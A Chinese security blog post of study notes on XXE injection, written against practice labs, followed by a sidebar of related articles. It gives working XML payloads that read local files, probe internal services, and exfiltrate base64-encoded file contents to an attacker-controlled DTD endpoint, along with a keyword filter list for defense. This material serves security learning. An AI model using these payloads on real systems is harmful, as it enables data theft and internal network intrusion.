网络安全笔记 -- XXE&XML(利用、检测、绕过)

最新推荐文章于 2024-03-15 10:20:52 发布
最新推荐文章于 2024-03-15 10:20:52 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 网络安全 文章标签: web安全 xml 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/swy66/article/details/127021506
版权

1. 概念

XML: 指可扩展标记语言,被设计用来传输和存储数据。

XXE: 全称(XML External Entity Injection)XML外部实体注入,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

2. 检测和利用

2.1 概要

检测

  • 白盒: 函数及可控变量查找、传输和存储数据格式类型
  • 黑盒: 人工、 工具

人工检测包含:

  • 数据格式类型判断:<user>test</user><pass>Mikasa</pass>
  • Content-Type值判断:text/xml、application/xml
  • 更改Content-Type值看返回

利用

  • 输出形式:有回显(http、file、各脚本协议、外部引用)、无回显(外部引用-反向链接配合)
  • 过滤绕过:协议玩法、外部引用、编码UTF-16BE

2.2 实例

2.2.1 pikachu平台实例(有回显)

在这里插入图片描述

读文件

<?xml version = "1.0"?>
<!DOCTYPE ANY [
	<!ENTITY xxe SYSTEM "file:///usr//a.txt">
]>
<x>&xxe;</x>

内网探针或攻击内网应用

<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
	<!ELEMENT foo ANY>
	<!ENTITY rabbit SYSTEM "http://127.0.0.1:8080/index.txt">
]>
<x>&rabbit;</x>

引入外部实体dtd(需要开启 “允许外部条件使用”)

<?xml version = "1.0" ?>
<!DOCTYPE test [
	<!ENTITY % file SYSTEM "http://127.0.0.1:8080/evil.dtd">
	%file;
]>
<x>&send;</x>

evil.dtd文件:

<!ENTITY send SYSTEM "file:///usr//a.txt">

2.2.2 pikachu平台实例(无回显)

读取文件,将文件内容发送到特定网站(攻击者网站),通过查看日志文件得到结果

<!DOCTYPE ANY [
	<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///usr//a.txt">
	<!ENTITY % dtd SYSTEM "http://127.0.0.1:8080/evil.dtd">
	%dtd;
	%send;
]>

evil.dtd文件:

<!ENTITY % payload 
"<!ENTITY &#x25; send SYSTEM 'http://127.0.0.1:8080/re.php?data=%file;'>"
 >
%payload;

2.2.3 xxe-lab平台实例

检测思路和利用

  1. 提交的数据包包含XML格式如:
    admin123
  2. 请求头中如:
    Content-Type: application/xml;charset=utf-8
    Content-Type: text/xml;charset=utf-8
  3. 构造payload,并上传
<?xml version = "1.0"?>
<!DOCTYPE ANY [
	<!ENTITY xxe SYSTEM "file:///usr//a.txt">
]>
<user><username>&xxe;</username><password>1</password></user>

在这里插入图片描述
在这里插入图片描述

3. 防御

1. 禁用外部实体
PHP
Python
Java

2. 过滤用户提交的XML数据

过滤关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC

3. 使用WAF产品

s.wy
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
学习日志9:XXE+php://filter绕过WAF读内网文件
m0_37622973的博客
09-08 1394
摘自freebuf 出处:https://www.freebuf.com/vuls/211822.html 基础知识: 1.php://filter是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;使用不同的参数可以达到不同的目的和效果:其中resource=<要过滤的数据流>,指定了要筛选过滤的数据流 2.php的data://text/plain;b...
基于XXE漏洞的网络安全分析与利用工具开发
最新发布
05-07
当应用是通过用户上传的XML文件或POST请求进行数唱的传输,并日应用没有禁止XNML引用外部实体,也没有过滤用户提交的XML数据,那么就会产生XML外部实体注入漏洞,即XXE漏洞。 XXE漏洞发生在应用程序解析XML输入时,...
第39天:WEB漏洞-XXE&XML利用检测绕过全解1
08-03
(2)外部文档声明 (1)内部实体声明 (2)外部实体声明 (3)参数实体声明
XXE&XML利用检测绕过
qq_41889600的博客
12-13 475
小迪安全xxe xml
WEB漏洞-XXE&XML利用检测绕过全解(39)
san3144393495的博客
06-29 1534
除了这个形式,还有一个过滤,我们绕过思路就是采用协议玩法,换一种协议去执行想要的结果,或者采用外部引用,把核心代码写到外部东西上面去,DTD上面去实现绕过,还有一种编码把一些关键词进行编码,达到关键字的绕过,根据具体情况选出不同的方案。判定这个漏洞存在之后,我们该如何去利用,分为两种,第一种是输出形式,利用的结果显示,分为两种情况,一种情况是有回显,一种是回显;xmlxml被设计成传输和储存数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容。
一行代码实现网页直接跳转抖音,2023年6月新方法
北鹤M的代码手账
06-13 1万+
之前方法已经失效,以下为新版本方案!
java8看不到源码-Apache-OFBiz-XXE:ApacheOFBiz<16.11.04的XXE注入(文件泄露)漏洞利用
06-04
XXE Apache OFBiz < 16.11.04 的 XXE 注入(文件泄露)漏洞利用 信息 16.11.04 版本之前的 Apache OFBiz 包含两个不同的 XXE 注入漏洞。 每个漏洞的公开披露可以在下面找到: [1] [2] 此漏洞利用针对链接 1 中...
第85天:CTF夺旗-JAVA考点反编译&XXE&反序列化1
08-03
网络安全领域,尤其是CTF(Capture The Flag)竞赛中,Java技术经常成为关键考点,涉及到的知识点包括但不限于反编译、XXEXML External Entity)攻击、反序列化漏洞以及文件安全。这些知识点是黑客攻防战中的...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用Web 应用程序安全中的一种常见的攻击方式。攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。因此,防止 XXE 漏洞的发生是非常重要的。
XXE&XML利用检测绕过漏洞
qq_49714982的博客
08-28 135
XML:传输和储存格式类型XXE:XML的漏洞注入全称(xml external entity injection)
[CSAWQual 2019]Web_Unagi xxe转码绕过waf
qq_54929891的博客
04-28 1374
搜索给我们的信息 flag在flag下面,可能要用到文件读取或者系统命令 可以看到它叫我们上传一个xml文件,应该是xxe漏洞了 这里应该是提示我们会回显哪些属性,可以看到password没有显示出来 利用之前的XXE模板https://xz.aliyun.com/t/6887#toc-0 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]&gt.
WEB漏洞原理】XML&XXE利用检测绕过
过期的秋刀鱼
09-14 865
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害XXEXML的一个漏洞XXE产生根本原因:网站接受XML数据,没有对xml进行过滤。
WAF机制及绕过方法
qq_64162562的博客
03-15 952
WAF(Web应用防火墙)是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。通俗来说就是WAF产品里集成了一定的检测规则,会对每个请求的内容根据生成的规则进行检测并对不符合安全规则的作出对应的防御处理,从而保证Web应用的安全性与合法性。我们在平时的渗透测试中,更多情况下会遇到的是网站开发人员自己写的防护规则。网站开发人员为了网站的安全,会在可能遭受攻击的地方增加一些安全防护代码,比如过滤敏感字符,对潜在的威胁的字符进行编码、转义等。
XXE漏洞原理/防御
热门推荐
wangyuxiang946的博客
07-16 1万+
XXE又叫 XML外部实体注入 , 攻击者修改DTD引入的外部文件 , 从而执行攻击 。
WAF绕过小技巧
tomyyyyy
09-22 6743
一、WAF绕过 1、脏数据绕过 即传入一段长数据使waf失效,从而实现绕过waf。某些waf处理POST的数据时,只会检测开头的8K,后面选择全部放过。 例如,当发现某网站存在一个反序列化漏洞时,但是无回显,被waf拦截了 利用脏数据插入5000个x字符,可以成功绕过。 2、高并发绕过 对请求进行并发,攻击请求会被负载均衡调度到不同节点,导致某些请求绕过waf的拦截 3、http参数污染...
WEB漏洞-XXE&XML利用检测绕过全解
xhscxj的博客
02-07 1584
xml基础概念 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 ...
XXE&XML利用检测绕过
weixin_52221158的博客
08-27 1328
XML被设计为传输和存储数据,XML文档结构包括XML声明,DTD文档类型定义(可选),文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。
XXE漏洞分析和防御
1ance's blog
05-19 226
目录介绍形成原因详细介绍防御 介绍 XML外部实体注入(XML External Entity),简称XXE漏洞。 形成原因 服务端接收并解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 详细介绍 这位师傅总结的非常好,直接参考这位师傅写的学习吧。 一篇文章带你深入理解漏洞之 XXE 漏洞 防御 1、禁用外部实体 2、过滤用户的输入(SYSTEM,PUBLIC、<!DOCTYPE、<!ENTITY)等。 ...
XXE漏洞
huangyongkang666的博客
03-29 2380
XXE漏洞 1.漏洞简介 ​ XXE 漏洞全称XML External Entity Injection,即 XML 外部实体注入漏洞,XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意 xml文件。 2.XML简介 ​ XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXEXML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以通过构造恶意的XML实体并将其发送给系统,然后利用系统对外部实体的解析不当来读取系统中的文件,包括敏感的配置文件、数据库信息。攻击者还可以通过XXE漏洞发起钓鱼攻击或者是向系统发送恶意的请求来进一步导致系统的安全漏洞。 为了防范泛微OA的XXE漏洞,建议以下几点: 1. 进行安全审计:对泛微OA系统进行定期的安全审计,通过检测系统中的漏洞和弱点,及时修复存在的XXE漏洞。 2. 模板限制:在处理外部XML实体时,应限制或阻止对外部实体的解析,避免可能的XXE攻击。可以通过设置合适的解析选项,限制对外部实体的访问权限。 3. 输入验证与过滤:对于用户输入的数据,应进行合理的验证和过滤,确保输入的内容符合预期格式,避免恶意的外部实体注入。 4. 更新补丁:定期保持泛微OA系统的更新与升级,及时安装官方发布的补丁和修复漏洞的版本。 5. 安全意识培训:加强企业员工的安全意识培训,提高他们对XXE漏洞及其他安全威胁的认识,避免因无意中点击恶意链接或下载恶意附件而导致漏洞的利用。 通过以上措施,可以有效地减少泛微OA中的XXE漏洞,提升系统的安全性。及早识别并修复漏洞,有助于保护企业的机密信息以及防止潜在的安全威胁发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值